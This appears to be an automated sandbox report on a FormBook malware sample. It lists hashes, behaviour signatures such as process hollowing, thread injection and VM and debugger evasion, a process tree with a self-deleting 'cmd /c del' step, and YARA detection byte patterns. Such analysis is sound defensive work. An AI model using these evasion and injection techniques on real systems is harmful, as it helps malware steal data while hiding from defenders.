Play interactive tour

Edit tour

Analysis Report NQQWym075C.exe

Overview

General Information

Sample Name:	NQQWym075C.exe
Analysis ID:	321308
MD5:	bf75ed61e1b1f7b310ec1d999077c4dd
SHA1:	cdced77e176e38ff459cdea08941de26861647cd
SHA256:	69357684ec8f83d428d2030db5f3d586718207e86457465e7fd37b3b4b7c4db2
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

NQQWym075C.exe (PID: 5264 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)

RegAsm.exe (PID: 5368 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wlanext.exe (PID: 1844 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)

cmd.exe (PID: 808 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cscript.exe (PID: 6064 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)

NQQWym075C.exe (PID: 1744 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)

RegAsm.exe (PID: 5776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x93138:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x934c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9f1c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x9ecb1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x9f2c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x9f43f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93eda:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x9df2c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x94c52:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xa42b7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xa535a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xa11e9:$sqlite3step: 68 34 1C 7B E1 0xa12fc:$sqlite3step: 68 34 1C 7B E1 0xa1218:$sqlite3text: 68 38 2A 90 C5 0xa133d:$sqlite3text: 68 38 2A 90 C5 0xa122b:$sqlite3blob: 68 53 D8 7F 8C 0xa1353:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xcf08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd292:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x18f95:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x18a81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x19097:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1920f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xdcaa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17cfc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xea22:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1e087:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f12a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1afb9:$sqlite3step: 68 34 1C 7B E1 0x1b0cc:$sqlite3step: 68 34 1C 7B E1 0x1afe8:$sqlite3text: 68 38 2A 90 C5 0x1b10d:$sqlite3text: 68 38 2A 90 C5 0x1affb:$sqlite3blob: 68 53 D8 7F 8C 0x1b123:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9520:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x98aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x155ad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15099:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x156af:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15827:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa2c2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14314:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb03a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a69f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b742:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175d1:$sqlite3step: 68 34 1C 7B E1 0x176e4:$sqlite3step: 68 34 1C 7B E1 0x17600:$sqlite3text: 68 38 2A 90 C5 0x17725:$sqlite3text: 68 38 2A 90 C5 0x17613:$sqlite3blob: 68 53 D8 7F 8C 0x1773b:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.RegAsm.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16679:$sqlite3step: 68 34 1C 7B E1 0x1678c:$sqlite3step: 68 34 1C 7B E1 0x166a8:$sqlite3text: 68 38 2A 90 C5 0x167cd:$sqlite3text: 68 38 2A 90 C5 0x166bb:$sqlite3blob: 68 53 D8 7F 8C 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
2.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.RegAsm.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.RegAsm.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15879:$sqlite3step: 68 34 1C 7B E1 0x1598c:$sqlite3step: 68 34 1C 7B E1 0x158a8:$sqlite3text: 68 38 2A 90 C5 0x159cd:$sqlite3text: 68 38 2A 90 C5 0x158bb:$sqlite3blob: 68 53 D8 7F 8C 0x159e3:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegAsm.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegAsm.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15879:$sqlite3step: 68 34 1C 7B E1 0x1598c:$sqlite3step: 68 34 1C 7B E1 0x158a8:$sqlite3text: 68 38 2A 90 C5 0x159cd:$sqlite3text: 68 38 2A 90 C5 0x158bb:$sqlite3blob: 68 53 D8 7F 8C 0x159e3:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegAsm.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
